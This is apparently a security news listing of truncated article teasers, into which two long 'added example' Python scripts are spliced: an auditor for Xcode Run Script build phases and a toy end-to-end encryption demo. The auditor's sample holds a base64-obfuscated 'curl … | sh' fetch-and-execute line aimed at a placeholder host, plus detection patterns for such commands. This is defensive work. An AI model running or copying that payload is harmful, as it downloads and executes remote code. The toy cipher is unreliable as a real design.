The necessary evolution to DevSecOps: Building security into the development lifecycle

Hindsight is a wonderful thing. Looking back on the early stages of DevOps, one moment of 20/20 clarity is that if people were doing it right from the beginning, there would be no need to change DevOps to DevSecOps. Security should have been part of the approach from the start.

Security should always be fundamental, but in a rush to develop new ideas or to deliver applications faster, it may get overlooked. This is, ironically, precisely what happened with DevOps. Establishing...

GitHub’s secret scanning for private repos launches alongside security overview

GitHub has launched its secret scanning tool for private repositories alongside a new security overview dashboard.

The world’s largest repo host first unveiled secret scanning, which detects credentials such as API keys and tokens that have been committed to a repository, in May last year as part of GitHub Advanced Security, a package of features that also includes code scanning and dependency review.

Secret scanning had been in beta until today. Since it was first announced, GitHub says it has:

Expanded secret...

Hackers are using shared Xcode projects to infect Apple developers

Developers for Apple’s platforms are being hacked by importing shared Xcode projects infected with malware.

Researchers from SentinelOne detailed the growing trend after discovering macOS malware dubbed XcodeSpy.

“Threat actors are abusing the Run Script feature in Apple’s Xcode IDE to infect unsuspecting Apple Developers via shared Xcode Projects,” the researchers explained.

“XcodeSpy is a malicious Xcode project that installs a custom variant...
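Because the infection vector is a Run Script build phase inside the shared project, the practical check before building someone else’s Xcode project is to read every such phase in project.pbxproj. The script below is an added example, not code from SentinelOne or from this article: it extracts each PBXShellScriptBuildPhase object, unescapes its shellScript value, and applies a few generic heuristics (decoding of base64, eval, network fetches, piping a download into a shell, backgrounded processes, long opaque blobs), peeling one layer of base64 so that an obfuscated script is scanned as what it actually runs. The sample pbxproj fragment is constructed for the demo, the host example.invalid is a reserved placeholder, and the indicator list is a starting point rather than a signature for XcodeSpy.

```python
"""Audit Run Script build phases in an Xcode project.pbxproj (added example)."""
import base64
import re

# Constructed sample payload: what a benign-looking but obfuscated Run Script
# would actually execute once decoded. example.invalid is a reserved name.
PAYLOAD_B64 = base64.b64encode(b"curl -s http://example.invalid/stage | sh").decode()

# Constructed excerpt of a project.pbxproj. Xcode stores a Run Script build
# phase as a PBXShellScriptBuildPhase object whose shellScript value holds the
# script text with quotes and newlines backslash-escaped.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		1A2B3C /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "# Type a script or drag a script file from your workspace to insert its path.\nswiftlint\n";
		};
		4D5E6F /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "eval \"$(echo PAYLOAD_B64 | base64 -d)\" &\n";
		};
/* End PBXShellScriptBuildPhase section */
'''.replace("PAYLOAD_B64", PAYLOAD_B64)

# One pbxproj object: "<id> /* name */ = { ... };" (name comment is optional).
OBJECT_RE = re.compile(
    r"^\s*(?P<id>[0-9A-Za-z]{6,32})\s*(?:/\*\s*(?P<name>.*?)\s*\*/)?\s*=\s*\{"
    r"(?P<body>.*?)^\s*\};",
    re.S | re.M,
)
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Generic heuristics (label, pattern). Hits mean "a human should read this",
# not "this is malware".
INDICATORS = [
    ("base64 decode", re.compile(r"base64\s+(-d|-D|--decode)")),
    ("eval of generated text", re.compile(r"\beval\b")),
    ("network fetch", re.compile(r"\b(curl|wget|nscurl)\b")),
    ("pipes download into a shell", re.compile(r"\|\s*(ba|z|)sh\b")),
    ("backgrounded process", re.compile(r"&\s*$", re.M)),
    ("long opaque blob", re.compile(r"[A-Za-z0-9+/=]{40,}")),
]


def unescape(raw):
    """Turn the pbxproj string literal back into the script text Xcode runs."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), raw)


def scan(script, depth=0):
    """Return indicator labels for a script, plus findings from decoded base64."""
    findings = [label for label, rx in INDICATORS if rx.search(script)]
    if depth == 0:  # peel one layer of base64 and rescan what it hides
        for blob in BLOB_RE.findall(script):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if all(c.isprintable() or c in "\n\t" for c in decoded):
                findings += ["decoded blob: " + f for f in scan(decoded, depth + 1)]
    return findings


def audit(pbxproj_text):
    """List every Run Script build phase with its script and heuristic findings."""
    report = []
    for m in OBJECT_RE.finditer(pbxproj_text):
        body = m.group("body")
        if not re.search(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;", body):
            continue
        s = SCRIPT_RE.search(body)
        script = unescape(s.group(1)) if s else ""
        report.append({"id": m.group("id"), "name": m.group("name"),
                       "script": script, "findings": scan(script)})
    return report


if __name__ == "__main__":
    for phase in audit(SAMPLE_PBXPROJ):
        print(f"{phase['id']} ({phase['name']}): {phase['findings'] or 'no indicators'}")
        print("  " + phase["script"].strip().replace("\n", "\n  "))
```

Run it against a real project with `audit(open("App.xcodeproj/project.pbxproj").read())`. Scheme files (`xcshareddata/xcschemes/*.xcscheme`) can also carry pre- and post-action scripts, so a complete review covers those as well; and the finding list is only as good as its heuristics, which is why the script prints the full text of every phase for a human to read rather than deciding on its own.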

Microsoft: Over 1,000 developers contributed to SolarWinds hack

According to Microsoft’s analysis of the devastating SolarWinds hack, more than 1,000 engineers worked on the attack.

The attack was described as “the largest and most sophisticated attack the world has ever seen,” by Microsoft president Brad Smith on US show 60 Minutes.

SolarWinds develops software to help businesses manage their networks, systems, and IT infrastructure. The company’s Orion solution is used by ~33,000 public and private sector customers.

In...

Corellium enables iOS device virtualisation on individual accounts

Security research firm Corellium has enabled the virtualisation of iOS devices on individual accounts.

Corellium prevailed in December in a lawsuit that Apple had filed against it, which led to this week’s policy change.

In the lawsuit, first filed in 2019, Apple alleged that Corellium’s virtualisation violated copyrights relating to iOS, iTunes, and their user interfaces. However, the court ruled in Corellium’s favour, finding that the virtualisation constitutes fair use.

Virtual iOS...

What app developers need to know about the DOJ’s formal request for encryption backdoors

When we text via Apple’s iMessage, WhatsApp, Signal, or a host of other messaging services, those messages are protected in ways communications across most other platforms are not. The reason is that these app developers use “end-to-end encryption” (or “E2EE”), which encrypts each message on the sender’s device before it leaves, so that only the recipient’s device can decrypt it; the provider’s servers relay ciphertext they cannot read. The only way to access and view these messages is by having the sender’s or recipient’s phone...
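To make the E2EE property concrete, here is an added example that is not code from the article or from any of the messengers it names: two clients agree a key with Diffie-Hellman, the sender encrypts and authenticates the message, and the provider’s server is modelled as a relay that only ever handles the resulting envelope. It uses only the Python standard library, so the group parameters (the prime 2**127 - 1 and generator 5) and the HMAC-based stream cipher are deliberately toy constructions chosen for readability; a real messenger uses a curve such as X25519 and a proper AEAD, and additionally authenticates the public keys that pass through the relay, since an unauthenticated relay could substitute its own.

```python
"""Toy end-to-end encrypted message through an untrusted relay (added example)."""
import hashlib
import hmac
import secrets

# Demonstration Diffie-Hellman group: P is the Mersenne prime 2**127 - 1.
# Toy parameters for readability, not a production parameter set.
P = 2**127 - 1
G = 5


def dh_keypair():
    """Return (private, public) for finite-field Diffie-Hellman."""
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def derive_key(shared_secret):
    """Hash the DH shared secret (fits in 16 bytes) into a 32-byte symmetric key."""
    return hashlib.sha256(shared_secret.to_bytes(16, "big")).digest()


def keystream(key, nonce, length):
    """Toy counter-mode keystream from HMAC-SHA256; stands in for a real AEAD."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(key, plaintext):
    """Encrypt-then-MAC envelope: nonce || ciphertext || 32-byte HMAC tag."""
    nonce = secrets.token_bytes(16)
    body = bytes(a ^ b for a, b in zip(plaintext, keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + body, hashlib.sha256).digest()
    return nonce + body + tag


def decrypt(key, envelope):
    """Verify the tag before decrypting; any modification in transit is rejected."""
    nonce, body, tag = envelope[:16], envelope[16:-32], envelope[-32:]
    expected = hmac.new(key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("message was modified in transit")
    return bytes(a ^ b for a, b in zip(body, keystream(key, nonce, len(body))))


class Relay:
    """The provider's server: stores and forwards envelopes, holds no keys."""

    def __init__(self):
        self.observed = []

    def forward(self, envelope):
        self.observed.append(envelope)
        return envelope


def exchange(message):
    """Alice sends `message` to Bob via the relay. Returns what Bob decrypted,
    everything the relay could observe, and whether both ends derived one key."""
    a_priv, a_pub = dh_keypair()
    b_priv, b_pub = dh_keypair()
    # Each side combines its own private value with the other's public value.
    # The public values would also travel through the relay in practice, which
    # is why real messengers let users verify them (safety numbers): otherwise
    # the relay could swap in its own keys and sit in the middle.
    a_key = derive_key(pow(b_pub, a_priv, P))
    b_key = derive_key(pow(a_pub, b_priv, P))
    relay = Relay()
    envelope = relay.forward(encrypt(a_key, message))
    return {
        "bob_reads": decrypt(b_key, envelope),
        "relay_observed": relay.observed,
        "keys_match": a_key == b_key,
    }


def tamper_detected(message):
    """A relay that flips one bit of the envelope is caught by the MAC."""
    key = derive_key(pow(G, 12345, P))  # any key serves for this check
    env = bytearray(encrypt(key, message))
    env[16] ^= 0x01
    try:
        decrypt(key, bytes(env))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    result = exchange(b"meet at noon")
    print("Bob reads:", result["bob_reads"])
    print("Relay saw:", result["relay_observed"][0].hex())
    print("Tampering detected:", tamper_detected(b"meet at noon"))
```

The point of the demo is what the relay holds: an envelope and nothing else, because the key exists only on the two endpoints. A lawful-access mechanism of the kind the DOJ is asking for would have to give the provider something equivalent to that key, which is the same capability any attacker who compromised the provider would inherit.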

‘Missions’ teach secure code practices to all those new programmers

Secure Code Warrior has launched ‘Missions’ to help teach safe coding practices during a time when more people are learning to code than ever.

As we reported in September, one in four people used their extra time at home during the first COVID-19 lockdown to start coding. With second lockdowns now in many countries, it’s likely even more people have taken their first steps in programming.

While the world could always do with more coders, the pandemic has also...

Why you need honeypots in the cloud: A guide

Cyberattacks, worms, viruses, and other digital threats are valid concerns for anyone who connects their systems to the internet.

Businesses that run their operations in the cloud are especially exposed to a variety of cyber threats, some of them not yet known even to security companies.

Security mechanisms such as honeypots can detect various types of attacks, whether the target is a server, router, cloud, network, or...

How to ensure your security tools work with testing for security validation

Discovering only after a cyber-attack that your security systems have vulnerabilities could significantly damage both your company’s reputation and its profit. If your organisation is online and digital, security systems are probably in place, but you may not be sure they truly work.

A good security validation approach tests the controls you already have rather than assuming they work, so that gaps are found before they cause major financial losses or data leakage.

Is your business likely to be a...

Decentralised platform Ethereum is hiring a dedicated security team for 2.0

The Ethereum Foundation is hiring a dedicated security team to ensure the next version of the decentralised platform is as robust as it needs to be.

A lot of money relies on the security of Ethereum. The explosion in DeFi (decentralised finance) means there is now $4.3 billion “locked up” in Ethereum apps – an increase of 442% over the past three months. Yet, this is tiny compared to the figures we could be discussing in a few years as DeFi growth continues and more use cases...